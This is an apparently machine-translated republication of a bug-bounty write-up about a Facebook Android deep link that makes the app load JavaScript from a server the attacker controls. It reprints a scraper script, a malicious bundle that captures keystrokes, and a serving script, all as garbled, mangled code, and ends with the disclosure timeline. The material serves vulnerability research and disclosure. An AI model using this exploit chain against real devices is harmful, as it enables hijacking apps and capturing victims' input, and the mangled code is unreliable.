Shulou(Shulou.com)05/31 Report--

How to use deep links to turn Facebook APP into a backdoor, many novices are not very clear about this. In order to help you solve this problem, the following editor will explain it in detail. People with this need can come and learn. I hope you can get something.

Recently, the author discovered a deep link vulnerability in the Facebook Android APP app, which can be used to transform the Facebook Android APP app installed on a user's phone into a backdoor program (Backdoor). In addition, this vulnerability can also be exploited to repackage Facebook APP and send it to a specific target victim installation. Let's take a look at the author's process of discovering this vulnerability and how to transform it into a security hazard in the actual production environment of Facebook APP through Payload construction.

Loophole discovery

Usually, when I do public testing, I will first carefully understand the application mechanism of the target system. In my last blog post, I have shared some experience in discovering deep links (deeplinks) in FB4A parameter applications by parsing Facebook APP, and here, I first share a script file that I have written, which can be used to automatically realize the discovery of Facebook APP deep links (deeplinks). The script file is-Facebook Android Deeplink Scraper (FBLinkBuilder.py), a Python-based code program designed to extract deep links (deeplinks) from Facebook APK:

Import os import jsonimport argparsefrom zipfile import ZipFile from datetime import datetimefname = datetime.now (). Strftime ("FB_Deeplinks%d%m%Y%H%M%S.txt") # default filenameparser = argparse.ArgumentParser () parser.add_argument ('- iota, help='Facebook APK file') parser.add_argument ('- oval, help='Output file', nargs='?', default=fname) parser.add_argument ('- eBay, help='Only show exported. Defaulted to False', nargs='?', default=False) args= parser.parse_args () file_name = args.i # apkoutput_name = args.o # generated output / providedexported = args.e # False / providedwith ZipFile (file_name 'r') as zip: print ('Extracting native routes file...') # fyi data = zip.read (' assets/react_native_routes.json') # extract file from zip js = json.loads (data.decode ("utf-8")) # to read as list params =''# placeholder I = 0 # deeplink count text_file = open (output_name "w") # open output print ('Manipulating data...') # fyi for key in js: # for each block in json for key2 in key [' paramDefinitions']: # grab the collection of params params + = key2 +'='+ str (key ['paramDefinitions'] [key2] [' type']). Upper () +'&'# append params with type if exported: # exported only if key.get ('access' '')! = 'exported': # check access key params =''# Reset params continue # try next block link = 'fb:/' + key [' path'] +'/?'+ params # build link print (link [:-1]) # fyi text_file.write (link [:-1] +'\ n') # write to file I + = 1 # increase counter params =''# reset params text_file.close () # save file print ('File:' + output_name + 'saved') # fyi print (str (I) +' deep links generated') # fyi

Download source: https://github.com/ashleykinguk/FBLinkBuilder/

Usage:.\ FBLinkBuilder.py-I fb0409.apk

Through the running implementation of FBLinkBuilder.py, we can compare the deep links between different APP versions, so as to observe the changes of application services in different APP versions. It is using this method that I found an unsafe deep link in Facebook APP 2020: fb://rnquantum_notification_handler/?address=, which was first added by Facebook APP in the 2020 version.

The parameter form of the deep link is hostname / ip, so I did a test with the self-built server 192.168.0.2: fb://rnquantum_notification_handler/?address=192.168.0.2:8224, through which you can pop up the following pop-up windows in Facebook APP:

After clicking the "Enable Quantum" button, I restarted Facebook APP, and then I tried to find the changes, but it all seemed normal. Next, I focused on network traffic. At that time, I thought of the white hat testing feature that Facebook opened for security researchers not long ago, through which security researchers can temporarily bypass security restrictions such as Facebook's certificate binding (Certificate Pinning) to test the network traffic of Facebook-related applications. Through the white hat test function, I found that after the above actions, Facebook APP will generate the following outgoing connection requests:

Http://192.168.0.2:8224/message?device=Android+SDK+built+for+x86+-+10+-+API+29&app=com.facebook.katana&clientid=DevSupportManagerImpl

Http://192.168.0.2:8224/status

The first request mechanism here is to pass the attribute information of the mobile device based on and intends to establish a websocket connection; the second request is to return the status information of the requesting host packager-status:running, which is the react-native source code built-in parameter of Facebook, which can be found in Github: / com/facebook/react/devsupport/DevServerHelper.java.

While I was trying to construct a response message in the self-contained server 192.168.0.2, I found another request generated by Facebook APP:

Http://192.168.0.2:8224/RKJSModules/EntryPoints/Fb4aBundle.bundle?platform=android&dev=true&minify=false

The purpose of this request is to find the FB4A parameter stored in the packaged file, which should be stored in clear text rather than the usual hbc* format in Facebook APP. I tried to enter the FB4A parameter in hbc* format for testing, but in the end it crashed Facebook APP.

In fact, for Facebook APP, before 2019, its package file (bundles) was stored in a formal file in the / assets/ directory, but after 2019, Facebook introduced the hbc format (* Hermes ByteCode), on the one hand, to reduce the size of APK, on the other hand, to prevent the core code from being explicit. Although I tried to use the hbc format tool HBCdump to generate a package file of about 250m for Facebook APP, it didn't seem to work.

Hijack Facebook APP

After that, I thought of another way to find the package file: by looking at the old version of Facebook APP and comparing the contents of the plaintext package with the error messages generated by the mobile device, the error messages generated by the mobile device are visible through logcat. After a comparison, I found the following clues:

_ _ fbBatchedBridge-required objects in the package file, which contain various functional components that are synchronized with the APP application

_ _ fbBatchedBridge.callFunctionReturnFlushedQueue-A function called by the APP background, and each call executes the corresponding action or event.

Based on the above findings, my idea is to enable Facebook APP to successfully download and execute the package file I constructed. In order to achieve this, I need to write my own package file and host it in my own host 192.168.0.2. The following is the package file FB4abundle.js I constructed:

/ * contact@ash-king.co.uk * / var I = 0, logs =''; / * our local vars * / * the below objects are required for the app to execute the bundle. See lines 47-55 for the custom js * / var _ _ fbBatchedBridge = {_ lazyCallableModules: {}, _ queue: [[], 0], _ callID: 0, _ lastFlush: 0, _ eventLoopStartTime: Date.now (), _ immediatesCallback: null, callFunctionReturnFlushedQueue: function (module, method Args) {return _ fbBatchedBridge.__guard (function () {_ fbBatchedBridge.__callFunction (module, method, args)}), _ _ fbBatchedBridge.flushedQueue ()}, callFunctionReturnResultAndFlushedQueue: function (e, u, s) {return _ fbBatchedBridge.__guard (function () {throw new Error ('callFunctionReturnResultAndFlushedQueue:' + a) }), _ _ fbBatchedBridge.flushedQueue ()}, invokeCallbackAndReturnFlushedQueue: function (an invokeCallbackAndReturnFlushedQueue:'+ a) {throw new Error ('invokeCallbackAndReturnFlushedQueue:' + a) }, flushedQueue: function (a, b) {if (a! = undefined) {throw new Error ('flushedQueue:' + b)} _ fbBatchedBridge.__callImmediates (); const queue = _ fbBatchedBridge._queue _ _ fbBatchedBridge._queue = [[], _ _ fbBatchedBridge._callID]; return queue [0] .length? Queue: null;}, onComplete: function (a) {throw new Error (a)}, _ _ callImmediates: function () {if (_ _ fbBatchedBridge._immediatesCallback! = null) {_ _ fbBatchedBridge._immediatesCallback (); throw new Error ('processCallbacks:' + _ fbBatchedBridge._immediatesCallback ()) }, getCallableModule: function (a) {const getValue = _ _ fbBatchedBridge._ lazyCallableModules [a]; return getValue? GetValue (): null;}, _ _ callFunction: function (a) if (a = = 'RCTNativeAppEventEmitter') {/ / Only capturing the search bar in settings i + = 1 / / increment count logs + = JSON.stringify (c) +'\ n' / / JSON Object if (I > 10) {/ * Here is where we will write out to logcat via js*/ var t = (nativeModuleProxy); throw new Error ('Look HERE:' + (logs) +'\ n\ r') }} _ _ fbBatchedBridge._lastFlush = Date.now (); _ _ fbBatchedBridge._eventLoopStartTime = _ _ fbBatchedBridge._lastFlush; const moduleMethods = _ _ fbBatchedBridge.getCallableModule (a); try {moduleMethods [b] .apply (moduleMethods, c) } catch (e) {} return-1}, _ _ guard: function (e) {try {e () } catch (error) {throw new Error ('_ guard:'+ error);}

In order for Facebook APP to call the package file automatically, I need another script file, fb_server.py:

# contact@ash-king.co.ukfrom http.server import BaseHTTPRequestHandler, HTTPServerimport loggingclass S (BaseHTTPRequestHandler): def _ set_response (self): self.send_response (500) self.send_header ('Content-type',' text/html') self.end_headers () self.wfile.write (bytes ("") "utf-8")) def do_GET (self): if self.path = ='/ status': self.resp_status () elif str (self.path). Find ('message?device=') >-1: self.resp_message () elif str (self.path). Find (' Fb4aBundle.bundle') >-1: self.resp_fb4a () Def do_POST (self): content_length = int (self.headers ['Content-Length']) post_data = self.rfile.read (content_length) logging.info ("POST request \ nPath:% s\ nHeaders:\ n% s\ n\ nBody:\ n% s\ n ", str (self.path), str (self.headers) Post_data.decode ('utf-8')) self._set_response () self.wfile.write ("POST request for {}" .format (self.path) .encode (' utf-8')) def resp_message (self): logging.info ("resp_message") self.send_response (200) self.send_header ('Content-type' 'text/html') self.end_headers () self.wfile.write (bytes ("", "utf-8") logging.info ("GET request,\ nPath:% s\ nHeaders:\ n% s\ n", str (self.path) Str (self.headers)) def resp_status (self): logging.info ("resp_status") self.send_response (200) self.send_header ('Content-type',' text/html') self.end_headers () self.wfile.write (bytes ("packager-status:running", "utf-8") logging.info ("GET request") \ nPath:% s\ nHeaders:\ n% s\ n ", str (self.path), str (self.headers) def resp_fb4a (self): logging.info (" resp_bundle ") self.send_response (200) self.send_header ('Content-type',' multipart/mixed') self.end_headers () with open ('FB4abundle.js' 'rb') as file: self.wfile.write (file.read ()) logging.info ("GET request,\ nPath:% s\ nHeaders:\ n% s\ n", str (self.path), str (self.headers)) def run (server_class=HTTPServer, handler_class=S, port=8224): logging.basicConfig (level=logging.INFO) server_address = (', port) httpd = server_class (server_address) Handler_class) logging.info ('Starting httpd...\ n') try: httpd.serve_forever () except KeyboardInterrupt: pass httpd.server_close () logging.info (' Stopping httpd...\ n') if _ _ name__ ='_ _ main__': from sys import argv run ()

Combining deep links, package file calls and my own "Enable Quantum" URL links, I can finally add my homemade code to the Facebook APP call package file and implement the calls by the deep links in it. In my POC vulnerability verification demonstration, if the victim runs my repackaged Facebook APP, I can block his input character traffic in Facebook APP, such as blocking the 5-character traffic he entered, "testi", and will display the characters he actually entered in logfile, and eventually generate an alarm prompt:

Vulnerability impact

A malicious attacker can exploit this vulnerability by physically contacting the APP on the mobile device or sending a repackaged APP to the victim, implanting a persistent connection into the victim's mobile device APP, and forming a backdoor for long-term perceptual detection of the victim's device APP.

However, at first, the Facebook security team ignored the vulnerability and chose to close the vulnerability report and classify it as not applicable, which they explained as follows:

Any user that is knowledgable enough to manage servers and write code would also be able to control how the app operates. That is also true for any browser extension or manual app created. A user is also able to proxy all their HTTP Traffic to manipulate those requests. Only being able to make local modifications with a PoC showing actual impact does not fully qualify for the Bug Bount.

After that, I released the POC authentication video, and an hour later, employees of the Facebook security team contacted me to say that they had reassessed the vulnerability and asked me to delete the POC authentication video. But at least 30 viewers watched the video before it was deleted.

Vulnerability assessment of Facebook security team

"after re-evaluating the vulnerability, we decided to reward the vulnerability according to our public testing standards. In the vulnerability you reported, you described the scenario in which the victim can be redirected to an attacker-controlled React Native Development server and insert malicious code into the victim's APP. Thank you for reporting the vulnerability."

Vulnerability reporting and handling process

2020.6.20-vulnerability escalation

2020.6.22-provide technical details

2020.6.23-Facebook classifies the vulnerability as NumberA

2020.6.23-I posted POC videos on Youtube

2020.6.23-Facebook reevaluates the vulnerability and asks me to delete the POC video

2020.6.24-vulnerability Classification

2020.6.26-Facebook mitigates by turning off the Quantum function

2020.8.20-Facebook fixes this vulnerability

2020.9.17-Facebook reward reward payment

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.